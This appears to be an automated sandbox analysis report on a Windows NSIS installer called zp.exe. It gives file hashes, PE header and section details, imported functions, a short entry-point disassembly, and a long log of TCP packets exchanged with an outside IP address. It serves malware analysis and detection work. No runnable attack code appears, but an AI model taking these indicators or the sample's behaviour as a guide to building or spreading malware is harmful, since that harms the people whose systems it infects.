                                                          Category:dropped
                                                          Size (bytes):594
                                                          Entropy (8bit):7.136914711734985
                                                          Encrypted:false
                                                          SSDEEP:12:6v/7wtZKjCVdCy6Cfgod/213voYKgOKW3UnBIambK:XtoC++godO1DK5Khn+K
                                                          MD5:B10CFE496FD2DF7F3AC90CEB92BB01A2
                                                          SHA1:E6043D3C15DFBBCF1383250AF33B521083ED4435
                                                          SHA-256:2674C9AD3B1DA0C1D4E2DF9388D19EA67E2031A99A9E9061E2C3A585BA2254A5
                                                          SHA-512:330A19FB1E3628FE757A524B947FFA482744ADD5899E46DA7088097E1E2C6B0B2B73AEE5A817ED58E3059D5679B8F5FA7B592E68BB9EA4336D292D04B0085ECC
                                                          Malicious:false
                                                          Preview:.PNG........IHDR................a....sBIT....|.d.....pHYs..........+......tEXtSoftware.www.inkscape.org..<.....tEXtAuthor.Jakub Steiner.../....tEXtDescription.mimetypes7..d...!tEXtSource.http://jimmac.musichall.czif.^...aIDAT8...=N.1...q.]....".kPFB.. !Qs...G......HH... .A( .c.E..f....4..7oF.......c...(........jMJ....f..F...Z.6......!.Aw{..p..,&..o.pE9..w..................d.;/Cf.D..y.Ts.;..s.8.,.E..[.... M3D..X...uF....;k..).Ur0.....j^.........1...`.i...t4u.Jc.X.....*.1..m.t0l........I..\...T...TxU..5..I....h.;..(-R.Q.......|x...Z....19.x.;.K.=...\.lkk.........N_.....IEND.B`.
                                                          Process:C:\Users\user\Desktop\zp.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):123679
                                                          Entropy (8bit):7.730320945274431
                                                          Encrypted:false
                                                          SSDEEP:3072:zgWbK0ErSUsHBVVkQ63SaafssNkJsdCZ3reRbZ4CsosX8iA1vkDi1z:z9xUsBkQ6CaGiJzFrehOCoX8Dwi1z
                                                          MD5:60B35112577AC87E67225EDCA27D63AC
                                                          SHA1:22DB32C5C56E9620080ABF0B7F6767C61D8FEA16
                                                          SHA-256:984E5BEEBF5D3D4A7A544300255D18F5E049B67BD13A5A4FF507AFB3F9B1BB6E
                                                          SHA-512:3F2250BC17AFF2D325F94539B71733BDFD16D6D94D851FAAE6C495FA9F066ADBE6E524C5926B2569C5DABD004EAC815C5EB5B32D164208B033C7D0E1FB8CE575
                                                          Malicious:false
                                                          Preview:.............TTTT....>......................SSS.................ll.............................[..../......rrr.qqq....#....9................... ..d...FF................rrrr................bb.....l..|.......................................==.....jj.............................#####..............11....f...EEE.........3..%%..............@.......7.^.nn........V..bbb..QQ.........u...RR...............N................uuu..............aa...... .................0................>>>>>........vvv.....uuu............g........].............................=...........*.....B.uuuu....EEE.ddddddddd..... ......MMMMMMMM.OO.......""..........vv...................................L..<............................777.----...............................d..b....ooooo......yyy...........qqq..ggg.-.7............\\..........G.1..,,............VVVV..............?...'......***..................22............"".......m.............---.................;.....eee.........w.....gg........].....++...JJ..d.......@..
                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                          Entropy (8bit):6.217350560053726
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 92.16%
                                                          • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:zp.exe
                                                          File size:535909
                                                          MD5:849acb6881494898ff4a18a4a0fbdb43
                                                          SHA1:1d7fe1693e30deb8ec2d4f2dc04e7c083fd53ab3
                                                          SHA256:f069f56e5597954dce10aff5fdaef9d3ba60bf8ebd996793c47193ecafba4481
                                                          SHA512:b7a75c27fd7aa8bb6384277eda73479df6b49c2c61a1cfa8d458809b787fbf46bbe72f44e9599c82cbed99fc11c53c3b59072bebe37953366932b88ad5dd0acf
                                                          SSDEEP:12288:Og0GDb777P77oF77PfI7szHhS+K+E7BoIJIuByPe6WZV9buv3mD:GLK9IQyPc396vWD
                                                          TLSH:71B498BFAD085CBEE3788AF1D26DF57890601CE228D742A155ED395A8B34CD8394DD38
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L.....oS.................\...........2.......p....@
                                                          Icon Hash:655c316951554545
                                                          Entrypoint:0x403217
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x536FD798 [Sun May 11 20:03:36 2014 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:59a4a44a250c4cf4f2d9de2b3fe5d95f
                                                          Instruction
                                                          sub esp, 00000184h
                                                          push ebx
                                                          push ebp
                                                          push esi
                                                          xor ebx, ebx
                                                          push edi
                                                          mov dword ptr [esp+18h], ebx
                                                          mov dword ptr [esp+10h], 00409130h
                                                          mov dword ptr [esp+20h], ebx
                                                          mov byte ptr [esp+14h], 00000020h
                                                          call dword ptr [00407034h]
                                                          push 00008001h
                                                          call dword ptr [004070B4h]
                                                          push ebx
                                                          call dword ptr [0040728Ch]
                                                          push 00000008h
                                                          mov dword ptr [00423798h], eax
                                                          call 00007F8FAC529E82h
                                                          mov dword ptr [004236E4h], eax
                                                          push ebx
                                                          lea eax, dword ptr [esp+38h]
                                                          push 00000160h
                                                          push eax
                                                          push ebx
                                                          push 0041ECA0h
                                                          call dword ptr [00407164h]
                                                          push 004091E4h
                                                          push 00422EE0h
                                                          call 00007F8FAC529B2Ch
                                                          call dword ptr [004070B0h]
                                                          mov ebp, 00429000h
                                                          push eax
                                                          push ebp
                                                          call 00007F8FAC529B1Ah
                                                          push ebx
                                                          call dword ptr [00407118h]
                                                          cmp byte ptr [00429000h], 00000022h
                                                          mov dword ptr [004236E0h], eax
                                                          mov eax, ebp
                                                          jne 00007F8FAC5270DCh
                                                          mov byte ptr [esp+14h], 00000022h
                                                          mov eax, 00429001h
                                                          push dword ptr [esp+14h]
                                                          push eax
                                                          call 00007F8FAC5295AAh
                                                          push eax
                                                          call dword ptr [00407220h]
                                                          mov dword ptr [esp+1Ch], eax
                                                          jmp 00007F8FAC527195h
                                                          cmp cl, 00000020h
                                                          jne 00007F8FAC5270D8h
                                                          inc eax
                                                          cmp byte ptr [eax], 00000020h
                                                          je 00007F8FAC5270CCh
                                                          Programming Language:
                                                          • [EXP] VC++ 6.0 SP5 build 8804
                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x350000x5bab8.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000x5be20x5c00False0.669921875data6.48151554579659IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rdata0x70000x11ce0x1200False0.4522569444444444OpenPGP Secret Key5.236122428806677IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .data0x90000x1a7d80x400False0.603515625data4.930453335376689IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .ndata0x240000x110000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0x350000x5bab80x5bc00False0.15177963215258855data5.016075638033607IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          NameRVASizeTypeLanguageCountry
                                                          RT_ICON0x353280x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336EnglishUnited States
                                                          RT_ICON0x773500x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States
                                                          RT_ICON0x87b780x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States
                                                          RT_ICON0x8bda00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States
                                                          RT_ICON0x8e3480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States
                                                          RT_ICON0x8f3f00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States
                                                          RT_ICON0x8fd780x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States
                                                          RT_DIALOG0x901e00x100dataEnglishUnited States
                                                          RT_DIALOG0x902e00x11cdataEnglishUnited States
                                                          RT_DIALOG0x904000xc4dataEnglishUnited States
                                                          RT_DIALOG0x904c80x60dataEnglishUnited States
                                                          RT_GROUP_ICON0x905280x68dataEnglishUnited States
                                                          RT_VERSION0x905900x1d8dataEnglishUnited States
                                                          RT_MANIFEST0x907680x34fXML 1.0 document, ASCII text, with very long lines (847), with no line terminatorsEnglishUnited States
                                                          DLLImport
                                                          KERNEL32.dllGetTickCount, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, SearchPathA, GetShortPathNameA, CreateFileA, GetFileSize, GetModuleFileNameA, ReadFile, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, CloseHandle, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrlenA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrcpyA, lstrcatA, GetSystemDirectoryA, GetVersion, GetProcAddress, GlobalAlloc, CompareFileTime, SetFileTime, ExpandEnvironmentStringsA, lstrcmpiA, lstrcmpA, WaitForSingleObject, GlobalFree, GetExitCodeProcess, GetModuleHandleA, GetTempPathA, GetWindowsDirectoryA, LoadLibraryExA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, WriteFile, FindClose, WritePrivateProfileStringA, MultiByteToWideChar, MulDiv, GetPrivateProfileStringA, FreeLibrary
                                                          USER32.dllCreateWindowExA, EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, GetDC, SystemParametersInfoA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, GetDlgItem, wsprintfA, SetForegroundWindow, ShowWindow, IsWindow, LoadImageA, SetWindowLongA, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, PostQuitMessage, FindWindowExA, SendMessageTimeoutA, SetWindowTextA
                                                          GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                          SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                                          ADVAPI32.dllRegCloseKey, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegEnumValueA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                          COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                          ole32.dllCoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                                          VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA
                                                          Language of compilation systemCountry where language is spokenMap
                                                          EnglishUnited States
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jun 1, 2023 12:30:30.094993114 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.255084038 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.255426884 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.256089926 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.416260958 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.419562101 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.419682980 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.419759035 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.419816971 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.419832945 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.419912100 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.419925928 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.419985056 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.420005083 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.420109034 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.420109034 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.420130014 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.420208931 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.420281887 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.420310974 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.420358896 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.420409918 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.420464039 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.420598030 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.580611944 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.580714941 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.580805063 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.580888033 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.580909014 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.580909967 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.580951929 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.580986977 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.581015110 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.581078053 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.581105947 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.581105947 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.581144094 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.581209898 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.581274986 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.581290960 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.581290960 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.581341028 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.581382036 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.581382036 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.581403971 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.581466913 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.581527948 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.581553936 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.581588984 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.581610918 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.581671000 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.581731081 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.581734896 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.581731081 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.581799030 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.581861019 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.581926107 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.581938028 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.581995964 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.581995964 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.582156897 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.742002010 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.742116928 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.742202997 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.742242098 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.742264032 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.742300034 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.742353916 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.742424965 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.742449999 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.742476940 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.742543936 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.742590904 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.742607117 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.742640972 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.742661953 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.742718935 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.742769957 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.742773056 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.742769957 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.742827892 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.742829084 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.742886066 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.742940903 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.742940903 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.742940903 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.742996931 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.743000031 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.743000031 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.743052006 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.743107080 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.743118048 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.743118048 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.743161917 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.743217945 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.743272066 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.743283033 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.743283033 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.743326902 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.743340015 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.743382931 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.743391037 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.743438959 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.743438959 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.743488073 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.743494987 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.743536949 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.743550062 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.743586063 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.743606091 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.743634939 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.743660927 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.743716002 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.743737936 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.743771076 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.743828058 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.743828058 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.743879080 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.743927002 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.743977070 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.744154930 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.744254112 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.744318962 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.744374037 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.744431973 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.744434118 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.744434118 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.744498014 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.744520903 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.744555950 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.744569063 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.744611025 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.744647026 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.744667053 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.744694948 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.744724035 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.744808912 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.744863033 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.903939009 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.904093027 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.904182911 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.904187918 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.904278994 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.904309034 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.904383898 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.904489994 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.904526949 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.904608965 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.904694080 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.904732943 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.904793024 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.904799938 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.904910088 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.904920101 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.904975891 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.905015945 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.905122042 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.905133009 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.905189037 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.905220032 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.905302048 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.905318975 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.905410051 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.905411005 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.905459881 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.905517101 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.905608892 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.905611992 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.905669928 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.905716896 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.905822039 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.905819893 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.905878067 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.905924082 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.906019926 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.906027079 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.906111956 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.906133890 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.906224012 CEST8049754203.175.174.69192.168.11.20
                                                          Jun 1, 2023 12:30:30.906244993 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.906301022 CEST4975480192.168.11.20203.175.174.69
                                                          Jun 1, 2023 12:30:30.906328917 CEST8049754203.175.174.69192.168.11.20
